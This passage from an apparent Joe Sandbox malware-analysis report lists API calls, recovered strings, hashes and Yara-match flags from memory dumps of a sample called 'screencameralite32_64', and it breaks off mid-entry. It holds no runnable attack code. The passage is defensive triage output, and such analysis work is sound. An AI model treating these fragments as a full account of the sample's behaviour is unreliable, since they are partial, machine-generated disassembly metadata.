                                                              • Source File: 00000002.00000002.2964215788.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000002.00000002.2964215788.000000000040B000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_400000_screencameralite32_64.jbxd
                                                              Similarity
                                                              • API ID: StringType$ByteCharMultiWide
                                                              • String ID:
                                                              • API String ID: 3852931651-0
                                                              • Opcode ID: 6d8eb81ee64157f72203894b93785b9b85560a11f4962ec6ebb452b13d20bf59
                                                              • Instruction ID: 7abba187aa9a424c0dbe6a0d425d95b5373609879485ba3de4d3a8f21a169ece
                                                              • Opcode Fuzzy Hash: 6d8eb81ee64157f72203894b93785b9b85560a11f4962ec6ebb452b13d20bf59
                                                              • Instruction Fuzzy Hash: 11418D72901209EFCF209F94CD85EAF3B79FB04754F11453AF912F2290D73989608B99
                                                              APIs
                                                              • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 02C71CB1
                                                              • CloseHandle.KERNEL32(?), ref: 02C71CBA
                                                              • InterlockedExchangeAdd.KERNEL32(02CA7244,00000000), ref: 02C71CC6
                                                              • TerminateThread.KERNEL32(?,00000000), ref: 02C71CD4
                                                              • QueueUserAPC.KERNEL32(02C71E7C,?,00000000), ref: 02C71CE1
                                                              • WaitForSingleObject.KERNEL32(?,000000FF), ref: 02C71CEC
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2965569706.0000000002C71000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C71000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_2c71000_screencameralite32_64.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: Wait$CloseExchangeHandleInterlockedMultipleObjectObjectsQueueSingleTerminateThreadUser
                                                              • String ID:
                                                              • API String ID: 1946104331-0
                                                              • Opcode ID: df9abd627c3e303ac77bc9269c497d9e9ca5ca2784d5a73f77170597e3909433
                                                              • Instruction ID: 3c6564df63f984bbb0222255b4d4d3d1678e996cc4d2359eaaf35da747d9a4e6
                                                              • Opcode Fuzzy Hash: df9abd627c3e303ac77bc9269c497d9e9ca5ca2784d5a73f77170597e3909433
                                                              • Instruction Fuzzy Hash: 83F0A471561214BFDB104B96DD0DE5BFFBCEB85720B00475DF52A82190DBB09924CBA0
                                                              APIs
                                                              • GetVersionExA.KERNEL32 ref: 00403ECB
                                                              • GetEnvironmentVariableA.KERNEL32(__MSVCRT_HEAP_SELECT,?,00001090), ref: 00403F00
                                                              • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 00403F60
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2964215788.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000002.00000002.2964215788.000000000040B000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_400000_screencameralite32_64.jbxd
                                                              Similarity
                                                              • API ID: EnvironmentFileModuleNameVariableVersion
                                                              • String ID: __GLOBAL_HEAP_SELECTED$__MSVCRT_HEAP_SELECT
                                                              • API String ID: 1385375860-4131005785
                                                              • Opcode ID: 24e6f3bd4125583b3bbf56e9767beae157ffe726f3734666c8e193c81b681956
                                                              • Instruction ID: b9728f854654bad712525c43123df79641ae2587965f18a3091eb02ea7af310c
                                                              • Opcode Fuzzy Hash: 24e6f3bd4125583b3bbf56e9767beae157ffe726f3734666c8e193c81b681956
                                                              • Instruction Fuzzy Hash: 42312771D002896DEB319A309C45BDA7F7C9B12309F2400FBE545F52C2D6398F8A8718
                                                              APIs
                                                              • std::exception::exception.LIBCMT ref: 02C818BF
                                                                • Part of subcall function 02C82413: std::exception::_Copy_str.LIBCMT ref: 02C8242C
                                                                • Part of subcall function 02C80C90: __CxxThrowException@8.LIBCMT ref: 02C80CEE
                                                              • std::exception::exception.LIBCMT ref: 02C8191E
                                                              Strings
                                                              • boost unique_lock has no mutex, xrefs: 02C818AE
                                                              • $, xrefs: 02C81923
                                                              • boost unique_lock owns already the mutex, xrefs: 02C8190D
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2965569706.0000000002C71000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C71000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_2c71000_screencameralite32_64.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: std::exception::exception$Copy_strException@8Throwstd::exception::_
                                                              • String ID: $$boost unique_lock has no mutex$boost unique_lock owns already the mutex
                                                              • API String ID: 2140441600-46888669
                                                              • Opcode ID: 784dd413b949b32dd2d4876f8f75386b4c677e74e566a6dcb0134dda214c841a
                                                              • Instruction ID: f57bfd94cab777e7f66055a7511ff7dfe21eb8ce21f6143989e113f10df8ff85
                                                              • Opcode Fuzzy Hash: 784dd413b949b32dd2d4876f8f75386b4c677e74e566a6dcb0134dda214c841a
                                                              • Instruction Fuzzy Hash: 0D2117B15087809FD720EF24C54875BBBE9BB89708F148E5DF4A587280D7B5E508CF92
                                                              APIs
                                                              • InterlockedExchange.KERNEL32(?,00000001), ref: 02C72350
                                                              • InterlockedExchange.KERNEL32(?,00000001), ref: 02C72360
                                                              • PostQueuedCompletionStatus.KERNEL32(00000000,00000000,00000000,00000000), ref: 02C72370
                                                              • GetLastError.KERNEL32 ref: 02C7237A
                                                                • Part of subcall function 02C71712: __EH_prolog.LIBCMT ref: 02C71717
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2965569706.0000000002C71000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C71000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_2c71000_screencameralite32_64.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: ExchangeInterlocked$CompletionErrorH_prologLastPostQueuedStatus
                                                              • String ID: pqcs
                                                              • API String ID: 1619523792-2559862021
                                                              • Opcode ID: 130b7f91e21150356c7612f569302ef6a718053c4a5ce019525b5cbf8ceb4347
                                                              • Instruction ID: b730962e0e307155e2b051bc72e87e0c461199187b9da115cc5d46b6d5da6f7f
                                                              • Opcode Fuzzy Hash: 130b7f91e21150356c7612f569302ef6a718053c4a5ce019525b5cbf8ceb4347
                                                              • Instruction Fuzzy Hash: 5BF054B0941304AFDB10AFB4980DBABBBACEB44605F004669E849D3140E770DA289B91
                                                              APIs
                                                              • __EH_prolog.LIBCMT ref: 02C74035
                                                              • GetProcessHeap.KERNEL32(00000000,?), ref: 02C74042
                                                              • RtlAllocateHeap.NTDLL(00000000), ref: 02C74049
                                                              • std::exception::exception.LIBCMT ref: 02C74063
                                                                • Part of subcall function 02C7A5FD: __EH_prolog.LIBCMT ref: 02C7A602
                                                                • Part of subcall function 02C7A5FD: Concurrency::cancellation_token::_FromImpl.LIBCPMT ref: 02C7A611
                                                                • Part of subcall function 02C7A5FD: __CxxThrowException@8.LIBCMT ref: 02C7A630
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2965569706.0000000002C71000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C71000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_2c71000_screencameralite32_64.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: H_prologHeap$AllocateConcurrency::cancellation_token::_Exception@8FromImplProcessThrowstd::exception::exception
                                                              • String ID: bad allocation
                                                              • API String ID: 3112922283-2104205924
                                                              • Opcode ID: fd012dc6d2839c5923d63b8cffee936b206123f01d8544496e2b1f9c276e9cb0
                                                              • Instruction ID: 111b1193e39f1186b6f91cfc9ba450048f89ebdd152ab728d8ad9417291087fe
                                                              • Opcode Fuzzy Hash: fd012dc6d2839c5923d63b8cffee936b206123f01d8544496e2b1f9c276e9cb0
                                                              • Instruction Fuzzy Hash: BAF08CF1E44209ABCF00EFE0C90CBAFBB78FB08304F804689E915A2240DB3442188FA1
                                                              APIs
                                                              • GetStartupInfoA.KERNEL32(?), ref: 00403D2D
                                                              • GetFileType.KERNEL32(00000800), ref: 00403DD3
                                                              • GetStdHandle.KERNEL32(-000000F6), ref: 00403E2C
                                                              • GetFileType.KERNEL32(00000000), ref: 00403E3A
                                                              • SetHandleCount.KERNEL32 ref: 00403E71
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2964215788.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000002.00000002.2964215788.000000000040B000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_400000_screencameralite32_64.jbxd
                                                              Similarity
                                                              • API ID: FileHandleType$CountInfoStartup
                                                              • String ID:
                                                              • API String ID: 1710529072-0
                                                              • Opcode ID: dbaca84f47ceea487b5a59e7f7eb21175bc7ba2e308e601fb33fec27d5f53662
                                                              • Instruction ID: 0b7b95883a4e689196e32d1b42849a04f4efe08137134e81777c7f486c9ce5ca
                                                              • Opcode Fuzzy Hash: dbaca84f47ceea487b5a59e7f7eb21175bc7ba2e308e601fb33fec27d5f53662
                                                              • Instruction Fuzzy Hash: 025125716046458BD7218F38CE847667FA8AF11722F15437AE4A2FB3E0C7389A45CB8D
                                                              APIs
                                                                • Part of subcall function 02C81990: CloseHandle.KERNEL32(00000000,AB81015D), ref: 02C819E1
                                                                • Part of subcall function 02C81990: WaitForSingleObject.KERNEL32(?,000000FF,AB81015D,?,?,?,?,AB81015D,02C81963,AB81015D), ref: 02C819F8
                                                              • ReleaseSemaphore.KERNEL32(?,?,00000000), ref: 02C81C5E
                                                              • ReleaseSemaphore.KERNEL32(?,?,00000000), ref: 02C81C7E
                                                              • CloseHandle.KERNEL32(?,?,?,?,?,?), ref: 02C81CB7
                                                              • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?), ref: 02C81D0B
                                                              • SetEvent.KERNEL32(?), ref: 02C81D12
                                                                • Part of subcall function 02C7418C: CloseHandle.KERNEL32(00000000,?,02C81C45), ref: 02C741B0
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2965569706.0000000002C71000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C71000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_2c71000_screencameralite32_64.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: CloseHandle$ReleaseSemaphore$EventObjectSingleWait
                                                              • String ID:
                                                              • API String ID: 4166353394-0
                                                              • Opcode ID: fd50249791e8b213b9c84d3f260188a669306bf84b03dfd2fe79f22de67efa68
                                                              • Instruction ID: c679731306a3cb52902456c6c2ab7c91028f8c41082187f6cfbc20f5fa927ea4
                                                              • Opcode Fuzzy Hash: fd50249791e8b213b9c84d3f260188a669306bf84b03dfd2fe79f22de67efa68
                                                              • Instruction Fuzzy Hash: EF41E2706007018BDB26AF28CC80716B7E4EF85728F288669EC18DB291E775D912CBD5
                                                              APIs
                                                              • InterlockedExchange.KERNEL32(?,00000001), ref: 02C720AC
                                                              • SetWaitableTimer.KERNEL32(00000000,?,00000001,00000000,00000000,00000000), ref: 02C720CD
                                                              • InterlockedExchangeAdd.KERNEL32(?,00000000), ref: 02C720D8
                                                              • InterlockedDecrement.KERNEL32(?), ref: 02C7213E
                                                              • InterlockedExchangeAdd.KERNEL32(?,00000000), ref: 02C721A6
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2965569706.0000000002C71000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C71000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_2c71000_screencameralite32_64.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: Interlocked$Exchange$DecrementTimerWaitable
                                                              • String ID:
                                                              • API String ID: 1611172436-0
                                                              • Opcode ID: c5c64cf43993cc1f4957a5f8456d29e949ab0bc6ef2c28a05b7a3c64492caed6
                                                              • Instruction ID: 4321f4d7443c0b2f1be711f6ed17350812d87567e9ef1d8d38a88da34ce4309e
                                                              • Opcode Fuzzy Hash: c5c64cf43993cc1f4957a5f8456d29e949ab0bc6ef2c28a05b7a3c64492caed6
                                                              • Instruction Fuzzy Hash: D4315A725047019FC315DF25D889A6BBBF9FFC8654F140A2EF89683650D730E90ACBA2
                                                              APIs
                                                              • __EH_prolog.LIBCMT ref: 02C7E030
                                                                • Part of subcall function 02C71A01: TlsGetValue.KERNEL32 ref: 02C71A0A
                                                              • InterlockedExchangeAdd.KERNEL32(?,00000000), ref: 02C7E0AF
                                                              • RtlEnterCriticalSection.NTDLL(?), ref: 02C7E0CB
                                                              • InterlockedIncrement.KERNEL32(02CA5180), ref: 02C7E0F0
                                                              • RtlLeaveCriticalSection.NTDLL(?), ref: 02C7E105
                                                                • Part of subcall function 02C727F3: SetWaitableTimer.KERNEL32(00000000,?,000493E0,00000000,00000000,00000000,00000000,00000000,0000000A,00000000), ref: 02C7284E
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2965569706.0000000002C71000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C71000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_2c71000_screencameralite32_64.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: CriticalInterlockedSection$EnterExchangeH_prologIncrementLeaveTimerValueWaitable
                                                              • String ID:
                                                              • API String ID: 1578506061-0
                                                              • Opcode ID: 8db7e97fa1602ff59a832a1720621b988b5ed21e0e0f6b7bf9bc48320e877341
                                                              • Instruction ID: 00ebc0863dfe7ff1d611e54fbbab47497f072706b61e2bc6120dd81688e04d87
                                                              • Opcode Fuzzy Hash: 8db7e97fa1602ff59a832a1720621b988b5ed21e0e0f6b7bf9bc48320e877341
                                                              • Instruction Fuzzy Hash: 573148B29012049FCB10DFA9C548AAEBBF9BF48314F14895ED849D7640E775AA04DFA0
                                                              APIs
                                                              • _malloc.LIBCMT ref: 02C902F0
                                                                • Part of subcall function 02C82EEC: __FF_MSGBANNER.LIBCMT ref: 02C82F03
                                                                • Part of subcall function 02C82EEC: __NMSG_WRITE.LIBCMT ref: 02C82F0A
                                                                • Part of subcall function 02C82EEC: RtlAllocateHeap.NTDLL(00B60000,00000000,00000001), ref: 02C82F2F
                                                              • _free.LIBCMT ref: 02C90303
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2965569706.0000000002C71000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C71000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_2c71000_screencameralite32_64.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: AllocateHeap_free_malloc
                                                              • String ID:
                                                              • API String ID: 1020059152-0
                                                              • Opcode ID: 3602ded995b946ba18e67532ef15d4fead509b2de358855d4ad18cbd3ef62789
                                                              • Instruction ID: a6b077b58b9eeb93376f8e819626e740f79d43f818fe720dd8c20ebce7e27595
                                                              • Opcode Fuzzy Hash: 3602ded995b946ba18e67532ef15d4fead509b2de358855d4ad18cbd3ef62789
                                                              • Instruction Fuzzy Hash: 99110672808615ABDF213F70AD0C76A379ABF403A8B118A26FD0D9B150EB70C650DAD4
                                                              APIs
                                                              • __EH_prolog.LIBCMT ref: 02C721DA
                                                              • InterlockedExchangeAdd.KERNEL32(?,00000000), ref: 02C721ED
                                                              • TlsGetValue.KERNEL32(?,?,?,?,?,?,?,?,00000001), ref: 02C72224
                                                              • TlsSetValue.KERNEL32(?,?,?,?,?,?,?,?,?,00000001), ref: 02C72237
                                                              • TlsSetValue.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 02C72261
                                                                • Part of subcall function 02C72341: InterlockedExchange.KERNEL32(?,00000001), ref: 02C72350
                                                                • Part of subcall function 02C72341: InterlockedExchange.KERNEL32(?,00000001), ref: 02C72360
                                                                • Part of subcall function 02C72341: PostQueuedCompletionStatus.KERNEL32(00000000,00000000,00000000,00000000), ref: 02C72370
                                                                • Part of subcall function 02C72341: GetLastError.KERNEL32 ref: 02C7237A
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2965569706.0000000002C71000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C71000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_2c71000_screencameralite32_64.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: ExchangeInterlockedValue$CompletionErrorH_prologLastPostQueuedStatus
                                                              • String ID:
                                                              • API String ID: 1856819132-0
                                                              • Opcode ID: 7a99dac1ef36b4873d0b6a17f9eb79b8cfedece63561b81984acb2b3a5bc6df2
                                                              • Instruction ID: 49c05f87434e907d045a15ba682ba7662855627cea1b84bed899d2cd8e532dbc
                                                              • Opcode Fuzzy Hash: 7a99dac1ef36b4873d0b6a17f9eb79b8cfedece63561b81984acb2b3a5bc6df2
                                                              • Instruction Fuzzy Hash: 0911B1B1D04114DBCF01AFA5D808AAEFBBAFF54324F10461AE81593260D7318A65DB81
                                                              APIs
                                                              • __EH_prolog.LIBCMT ref: 02C7229D
                                                              • InterlockedExchangeAdd.KERNEL32(?,00000000), ref: 02C722B0
                                                              • TlsGetValue.KERNEL32 ref: 02C722E7
                                                              • TlsSetValue.KERNEL32(?), ref: 02C72300
                                                              • TlsSetValue.KERNEL32(?,?,?), ref: 02C7231C
                                                                • Part of subcall function 02C72341: InterlockedExchange.KERNEL32(?,00000001), ref: 02C72350
                                                                • Part of subcall function 02C72341: InterlockedExchange.KERNEL32(?,00000001), ref: 02C72360
                                                                • Part of subcall function 02C72341: PostQueuedCompletionStatus.KERNEL32(00000000,00000000,00000000,00000000), ref: 02C72370
                                                                • Part of subcall function 02C72341: GetLastError.KERNEL32 ref: 02C7237A
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2965569706.0000000002C71000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C71000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_2c71000_screencameralite32_64.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: ExchangeInterlockedValue$CompletionErrorH_prologLastPostQueuedStatus
                                                              • String ID:
                                                              • API String ID: 1856819132-0
                                                              • Opcode ID: 3323cec4c5a20973106f925f47708eb1a94960bbc584b827d88eb95777649990
                                                              • Instruction ID: b0d48d84652a6294e080b776a8c8883424aa07973c8a9abd614cc6f0a3dd4767
                                                              • Opcode Fuzzy Hash: 3323cec4c5a20973106f925f47708eb1a94960bbc584b827d88eb95777649990
                                                              • Instruction Fuzzy Hash: 3E1160B2D10118EBCF01AFA5D848AAEFFBAFF44310F00466AE804A3250D7714A65DF91
                                                              APIs
                                                                • Part of subcall function 02C7B098: __EH_prolog.LIBCMT ref: 02C7B09D
                                                              • __CxxThrowException@8.LIBCMT ref: 02C7BC62
                                                                • Part of subcall function 02C8449A: RaiseException.KERNEL32(?,?,02C7FA92,?,?,?,?,?,?,?,02C7FA92,?,02CA0F78,?), ref: 02C844EF
                                                              • WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,02CA1D94,?,00000001), ref: 02C7BC78
                                                              • InterlockedExchange.KERNEL32(?,00000001), ref: 02C7BC8B
                                                              • PostQueuedCompletionStatus.KERNEL32(?,00000000,00000001,00000000,?,?,?,02CA1D94,?,00000001), ref: 02C7BC9B
                                                              • InterlockedExchangeAdd.KERNEL32(?,00000000), ref: 02C7BCA9
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2965569706.0000000002C71000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C71000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_2c71000_screencameralite32_64.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: ExchangeInterlocked$CompletionExceptionException@8H_prologObjectPostQueuedRaiseSingleStatusThrowWait
                                                              • String ID:
                                                              • API String ID: 2725315915-0
                                                              • Opcode ID: 3a9a0d0c7fc5d5667ee07ab38d738b0ac73c3b276bca3213f9b4c3242480001b
                                                              • Instruction ID: baf41a22b3d8167e46802a08bd68397c6651acb9989e038c38dfe76cec56e171
                                                              • Opcode Fuzzy Hash: 3a9a0d0c7fc5d5667ee07ab38d738b0ac73c3b276bca3213f9b4c3242480001b
                                                              • Instruction Fuzzy Hash: 070181B2A50705AFDB10AAB4DC8DF8ABBADEB04759F008514F625D6190DBA0EC199B60
                                                              APIs
                                                              • InterlockedCompareExchange.KERNEL32(?,00000001,00000000), ref: 02C72432
                                                              • PostQueuedCompletionStatus.KERNEL32(?,00000000,00000002,?), ref: 02C72445
                                                              • RtlEnterCriticalSection.NTDLL(?), ref: 02C72454
                                                              • InterlockedExchange.KERNEL32(?,00000001), ref: 02C72469
                                                              • RtlLeaveCriticalSection.NTDLL(?), ref: 02C72470
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2965569706.0000000002C71000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C71000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_2c71000_screencameralite32_64.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: CriticalExchangeInterlockedSection$CompareCompletionEnterLeavePostQueuedStatus
                                                              • String ID:
                                                              • API String ID: 747265849-0
                                                              • Opcode ID: ddfc2f001c258aa445c943726760ad4f2af76a8a2d745d6361a95b96669dc3b0
                                                              • Instruction ID: 95359eaf2525561308e4ac0abdbbb93c37673a99cb50ae66a203c45a99d8b15a
                                                              • Opcode Fuzzy Hash: ddfc2f001c258aa445c943726760ad4f2af76a8a2d745d6361a95b96669dc3b0
                                                              • Instruction Fuzzy Hash: 6DF030B2651204BBDB109FA1ED4DFE6B72CFB45711F805521F701D6480D761A534CBE1
                                                              APIs
                                                              • InterlockedIncrement.KERNEL32(?), ref: 02C71ED2
                                                              • PostQueuedCompletionStatus.KERNEL32(?,?,?,00000000,00000000,?), ref: 02C71EEA
                                                              • RtlEnterCriticalSection.NTDLL(?), ref: 02C71EF9
                                                              • InterlockedExchange.KERNEL32(?,00000001), ref: 02C71F0E
                                                              • RtlLeaveCriticalSection.NTDLL(?), ref: 02C71F15
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2965569706.0000000002C71000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C71000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_2c71000_screencameralite32_64.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: CriticalInterlockedSection$CompletionEnterExchangeIncrementLeavePostQueuedStatus
                                                              • String ID:
                                                              • API String ID: 830998967-0
                                                              • Opcode ID: 69c1e3d95bf87a8f99f3b5043ee3f5188cedb3c38671fb6165042490992a9f9e
                                                              • Instruction ID: d9465614437b93a153d39746c73f313499bd98fd7ff59bb268727447cecc0b70
                                                              • Opcode Fuzzy Hash: 69c1e3d95bf87a8f99f3b5043ee3f5188cedb3c38671fb6165042490992a9f9e
                                                              • Instruction Fuzzy Hash: CCF03AB2652605BBDB00AFA1ED8CFDABB2CFF54355F001516F60186841DB71A639CBE0
                                                              APIs
                                                                • Part of subcall function 02C79A0C: __EH_prolog.LIBCMT ref: 02C79A11
                                                                • Part of subcall function 02C79A0C: _Allocate.LIBCPMT ref: 02C79A68
                                                                • Part of subcall function 02C79A0C: _memmove.LIBCMT ref: 02C79ABF
                                                              • FormatMessageA.KERNEL32(00001200,00000000,?,00000400,?,00000010,00000000), ref: 02C808E2
                                                              • GetLastError.KERNEL32(?,00000400,?,00000010,00000000), ref: 02C808EA
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2965569706.0000000002C71000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C71000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_2c71000_screencameralite32_64.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: AllocateErrorFormatH_prologLastMessage_memmove
                                                              • String ID: Unknown error$invalid string position
                                                              • API String ID: 1017912131-1837348584
                                                              • Opcode ID: 89ec6ec3f6a5b4ed06a45a5a0d3de4ba3f5e0b43c730c3cdef8154735cc9c0f3
                                                              • Instruction ID: c3e45b11e396be8e62c83eb3a19d2ea8f9b7aee93ddf41074caf840724db87b4
                                                              • Opcode Fuzzy Hash: 89ec6ec3f6a5b4ed06a45a5a0d3de4ba3f5e0b43c730c3cdef8154735cc9c0f3
                                                              • Instruction Fuzzy Hash: 3E51BD70608341CFE714EF25C894B2EBBE4EB98748F50492DF48297691D771E688CF96
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2965569706.0000000002C71000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C71000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_2c71000_screencameralite32_64.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: _memmove
                                                              • String ID: invalid string position$string too long
                                                              • API String ID: 4104443479-4289949731
                                                              • Opcode ID: bd4159fcb1906d532e4b2ae3118ddcc8de345a46dd6a20f3de00f5cd55f2af47
                                                              • Instruction ID: 989924cb4475e50b44c7958922de59fe0859052d2703957d30bd2c0637bc7a8f
                                                              • Opcode Fuzzy Hash: bd4159fcb1906d532e4b2ae3118ddcc8de345a46dd6a20f3de00f5cd55f2af47
                                                              • Instruction Fuzzy Hash: B941B771300305AFDB34DE69DC88A56BBAAEF81714B004A2DFA57C7781C770E944DBA1
                                                              APIs
                                                              • WSASetLastError.WS2_32(00000000), ref: 02C730C3
                                                              • WSAStringToAddressA.WS2_32(?,?,00000000,?,?), ref: 02C73102
                                                              • _memcmp.LIBCMT ref: 02C73141
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2965569706.0000000002C71000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C71000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_2c71000_screencameralite32_64.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: AddressErrorLastString_memcmp
                                                              • String ID: 255.255.255.255
                                                              • API String ID: 1618111833-2422070025
                                                              • Opcode ID: c882189ae3814e400ea9ec4b67bb16add0b2eb1a644a64fcafc4171c0692480a
                                                              • Instruction ID: f1923193ed669c5f4e32a3fcbb9ca0f7a9dac50fc4803fb3388dfdb50aa4f8a0
                                                              • Opcode Fuzzy Hash: c882189ae3814e400ea9ec4b67bb16add0b2eb1a644a64fcafc4171c0692480a
                                                              • Instruction Fuzzy Hash: EE31A771900345DFDB20AF74CC84BAEB7A5FF85324F1085A9EC695B280DB729A45DF90
                                                              APIs
                                                              • __EH_prolog.LIBCMT ref: 02C71F5B
                                                              • CreateIoCompletionPort.KERNEL32(000000FF,00000000,00000000,000000FF,?,00000000), ref: 02C71FC5
                                                              • GetLastError.KERNEL32(?,00000000), ref: 02C71FD2
                                                                • Part of subcall function 02C71712: __EH_prolog.LIBCMT ref: 02C71717
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2965569706.0000000002C71000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C71000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_2c71000_screencameralite32_64.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: H_prolog$CompletionCreateErrorLastPort
                                                              • String ID: iocp
                                                              • API String ID: 998023749-976528080
                                                              • Opcode ID: 500a8b1ee2e3a1134d93e267538cfd0b146d1c0f1b9be77236e8ae8fd6b7641c
                                                              • Instruction ID: e1f1bb7fd8dcb0834bd6f394203eefc894c3fa4444c9a1b21c3b308292c61bf9
                                                              • Opcode Fuzzy Hash: 500a8b1ee2e3a1134d93e267538cfd0b146d1c0f1b9be77236e8ae8fd6b7641c
                                                              • Instruction Fuzzy Hash: E921A2B1901B449BCB209F6AC54455BFBF8FFA4720B108A1FE4AA83A50D7B0A604DF91
                                                              APIs
                                                              • _malloc.LIBCMT ref: 02C83AA7
                                                                • Part of subcall function 02C82EEC: __FF_MSGBANNER.LIBCMT ref: 02C82F03
                                                                • Part of subcall function 02C82EEC: __NMSG_WRITE.LIBCMT ref: 02C82F0A
                                                                • Part of subcall function 02C82EEC: RtlAllocateHeap.NTDLL(00B60000,00000000,00000001), ref: 02C82F2F
                                                              • std::exception::exception.LIBCMT ref: 02C83AC5
                                                              • __CxxThrowException@8.LIBCMT ref: 02C83ADA
                                                                • Part of subcall function 02C8449A: RaiseException.KERNEL32(?,?,02C7FA92,?,?,?,?,?,?,?,02C7FA92,?,02CA0F78,?), ref: 02C844EF
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2965569706.0000000002C71000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C71000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_2c71000_screencameralite32_64.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: AllocateExceptionException@8HeapRaiseThrow_mallocstd::exception::exception
                                                              • String ID: bad allocation
                                                              • API String ID: 3074076210-2104205924
                                                              • Opcode ID: 38b9737883fc8e24fcfd9153147eabf94f65b82359149a36708983ae4cbb5a5c
                                                              • Instruction ID: 77904c05e8b1026e04121bf34c4ca14054f23bbca48cf69b358c3b3bd508bb5b
